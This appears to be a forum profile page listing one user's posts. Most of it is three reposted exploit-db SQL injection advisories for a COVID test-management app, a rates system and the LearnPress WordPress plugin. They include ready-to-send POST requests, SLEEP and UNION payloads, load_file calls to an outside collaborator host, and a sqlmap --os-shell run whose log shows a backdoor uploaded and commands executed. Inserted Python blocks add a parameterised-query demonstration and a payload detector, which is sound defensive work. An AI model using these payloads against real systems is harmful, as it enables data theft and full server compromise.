GabrielRo
Members: 23 posts, 2 days won

Posts posted by GabrielRo

  1. 54 minutes ago, 0xStrait said:

    Hi, you can never know 100% whether a file is malicious or not (only if you analyze the executable). All the sites like virustotal and the others actually receive "alerts" from various services/antiviruses saying that the file with that hash contains a "virus". Best to run it in a virtual machine, with no internet connection. The virtual machine can also be escaped (guest to host escape), but I don't think that's the case here.

    The results seem to be OK, hybrid-analysis - possibly a false positive

    Good luck!

    Thanks, good luck to you too.

  2. 5 hours ago, Nytro said:

    Hi, to me it seems like a big pile of junk. True, you might have better odds there of finding who knows what drugs or other rubbish, but apart from that it is of no use at all.

    I'm waiting for some different opinions too, maybe I'm wrong. As for "hacking", all I found was rubbish from something like 30 years ago, seemingly written by 12-year-olds during CS:GO breaks.

    That's right, everything that is public here you can also find there: blown-up IRC botnet sources, Rxbot, programs written in Visual Basic, DoS Attack.

  3. Vulnerable App:
     
    # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
    # Google Dork: intitle: "COVID19 Testing Management System"
    # Date: 09/08/2021
    # Exploit Author: Ashish Upsham
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    
    Description:
    
    The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
    SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
    
    ==================== 1. SQLi ====================
    
    http://192.168.0.107:80/covid-tms/patient-search-report.php
    
    The "searchdata" parameter is vulnerable to SQL injection; it was also tested, and an unauthenticated
    user has the full ability to run system commands via --os-shell and fully compromise the system.
    
    POST parameter 'searchdata' is vulnerable.
    
    step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
    step 2 : Now copy the post request and save it as test.txt file.
    step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
    
    ----------------------------------------------------------------------
    Parameter: searchdata (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
    
    [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
    [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
    [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
    [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php
    [19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output:  'laptop-ashish\ashish'
    os-shell>

     

    Source: https://www.exploit-db.com/exploits/50190

    • Upvote 1
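The advisory above reports that the value of 'searchdata' is spliced straight into a MySQL query, which is why a UNION-shaped probe with the right column count can return attacker-chosen rows. The following Python/sqlite3 sketch is an added example, not code from the PHPgurukul application or from exploit-db: it assumes a hypothetical five-column tblpatient table looked up by patient number or mobile, and places the concatenated query beside its parameterised form so the same inputs can be run through both.

```python
import sqlite3

# Constructed sample rows for a hypothetical patient table (not the real schema)
PATIENTS = [
    (1, "PT-1001", "Alice", "555-0101", "negative"),
    (2, "PT-1002", "Bob", "555-0102", "positive"),
    (3, "PT-1003", "Carol", "555-0103", "pending"),
]

# Probe shaped like the advisory's UNION payload: five columns plus a comment tail
UNION_PROBE = "' UNION ALL SELECT NULL,NULL,'injected',NULL,NULL-- -"
# Classic quote-breaking tautology
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """Fresh in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblpatient (id INTEGER, patient_no TEXT, name TEXT, "
        "mobile TEXT, result TEXT)"
    )
    conn.executemany("INSERT INTO tblpatient VALUES (?,?,?,?,?)", PATIENTS)
    return conn


def search_vulnerable(conn, searchdata):
    """Input becomes part of the SQL text, so its quotes and keywords are parsed as SQL."""
    sql = (
        "SELECT id, patient_no, name, mobile, result FROM tblpatient "
        "WHERE patient_no = '" + searchdata + "' OR mobile = '" + searchdata + "'"
    )
    return conn.execute(sql).fetchall()


def search_hardened(conn, searchdata):
    """Input is bound as a parameter; the engine only ever compares it as a value."""
    sql = (
        "SELECT id, patient_no, name, mobile, result FROM tblpatient "
        "WHERE patient_no = ? OR mobile = ?"
    )
    return conn.execute(sql, (searchdata, searchdata)).fetchall()


def compare(searchdata):
    """Run one input through both versions; returns (concatenated_rows, bound_rows)."""
    return search_vulnerable(make_db(), searchdata), search_hardened(make_db(), searchdata)


if __name__ == "__main__":
    for probe in ("PT-1002", TAUTOLOGY, UNION_PROBE):
        vuln, hard = compare(probe)
        print(repr(probe), "-> concatenated:", vuln, "| bound:", hard)
```

A legitimate patient number returns the same single row from both functions; the tautology returns every row from the concatenated query and nothing from the bound one, and the UNION probe yields a row the table never contained from the concatenated query only. The fix is the one the advisory implies: bind every user-supplied value, never build SQL by string concatenation.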
  4. Vulnerable App:
     
    # Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
    # Date: 11-08-2021
    # Exploit Author: Halit AKAYDIN (hLtAkydn)
    # Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
    # Version: V1.0
    # Category: Webapps
    # Tested on: Linux/Windows
    
    # Description:
    # PHP Dashboards is prone to an SQL-injection vulnerability
    # because it fails to sufficiently sanitize user-supplied data before using
    # it in an SQL query. Exploiting this issue could allow an attacker to
    # compromise the application, access or modify data, or exploit latent
    # vulnerabilities in the underlying database.
    
    # Vulnerable Request:
    
    POST /register.php HTTP/1.1
    Host: localhost
    Content-Length: 70
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
    Connection: close
    
    ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register=
    
    # Vulnerable Payload:
    # Parameter: ClientId (POST)
    # Type: time-based blind
    # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    # Payload:
    
    ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR
    
    --------------------------------------------------------------------------------------------------------------------------
    
    # Vulnerable Request:
    
    POST /passwordreset.php HTTP/1.1
    Host: localhost
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/passwordreset.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
    Connection: close
    
    loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
    
    # Vulnerable Payload:
    # Parameter: loginId (POST)
    # Type: time-based blind
    # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    # Payload:
    
    loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX

     

     

    Source: https://www.exploit-db.com/exploits/50192

    • Upvote 1
  5. # Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
    # Date: 07-17-2021
    # Exploit Author: nhattruong or nhattruong.blog
    # Vendor Homepage: https://thimpress.com/learnpress/
    # Software Link: https://wordpress.org/plugins/learnpress/
    # Version: < 3.2.6.8
    # References link: https://wpscan.com/vulnerability/10208
    # CVE: CVE-2020-6010

    POC:
    1. Go to url http://<host>/wp-admin
    2. Login with a cred
    3. Execute the payload


    POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: application/json, text/plain, */*
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Content-Length: 128
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

    type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

    # Modify current_items[] as you want   

     

     

     

    Source: https://www.exploit-db.com/exploits/50137

    • Upvote 1
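The three advisories above (posts 3, 4 and 5) all carry the same sqlmap-style shapes inside a POST body: SLEEP(n) for time-based blind probing, UNION ... SELECT, load_file(, a trailing "-- -" comment and a quoted tautology such as 'x'='x. The detector below is an added example, not part of any of the posts or of sqlmap; it assumes request bodies are available as raw application/x-www-form-urlencoded strings (for instance from a reverse proxy or WAF log) and runs a small set of regexes over each decoded parameter. The sample records are constructed here from the payload shapes shown above, with the collaborator hostname replaced by a placeholder.

```python
import re
from urllib.parse import parse_qsl

# Payload shapes taken from the three advisories above (posts 3, 4 and 5)
INDICATORS = {
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "sql_comment_tail": re.compile(r"--\s-|--\s*$"),
    "quoted_tautology": re.compile(r"'\s*(?:=|like)\s*'", re.I),
}

# Constructed (path, body) records modelled on the advisories; hostname is a placeholder
SAMPLE_REQUESTS = [
    ("/covid-tms/patient-search-report.php",
     "searchdata=PT-1002&search=Search"),  # benign lookup
    ("/covid-tms/patient-search-report.php",
     "searchdata=809262'+(select load_file('collab.example'))+'') AND "
     "(SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search"),
    ("/register.php",
     "ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND "
     "'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR"),
    ("/wordpress/wp-admin/post-new.php?post_type=lp_order",
     "type=lp_course&context=order-items&context_id=32&term=+test&paged=1"
     "&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -"),
    ("/covid-tms/patient-search-report.php",
     "searchdata=809262' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -&search=Search"),
    ("/register.php",
     "ClientId=0001&email=user%40example.org&pwd1=123456&pwd2=123456&register="),  # benign
]


def scan_value(value):
    """Return the sorted names of every indicator matching one decoded parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def scan_body(body):
    """Decode a form-encoded body and map each suspicious parameter to its indicators."""
    findings = {}
    # parse_qsl splits on '&' and the first '=', then URL-decodes (so '+' becomes a space)
    for param, value in parse_qsl(body, keep_blank_values=True):
        hits = scan_value(value)
        if hits:
            findings[param] = hits
    return findings


def scan_requests(requests):
    """Produce (path, parameter, indicators) alerts for a batch of request records."""
    alerts = []
    for path, body in requests:
        for param, hits in scan_body(body).items():
            alerts.append((path, param, hits))
    return alerts


if __name__ == "__main__":
    for path, param, hits in scan_requests(SAMPLE_REQUESTS):
        print(f"ALERT {path} param={param!r} indicators={hits}")
```

Decoding before matching matters: the first advisory's payload arrives with '+' standing in for spaces, so a regex run over the raw body would miss the word boundary in front of "select". Two benign bodies produce no alert, and a single match on a time-based indicator is worth correlating with response latency on the same path, which is the signal sqlmap's SLEEP() probes leave behind even when the query itself fails.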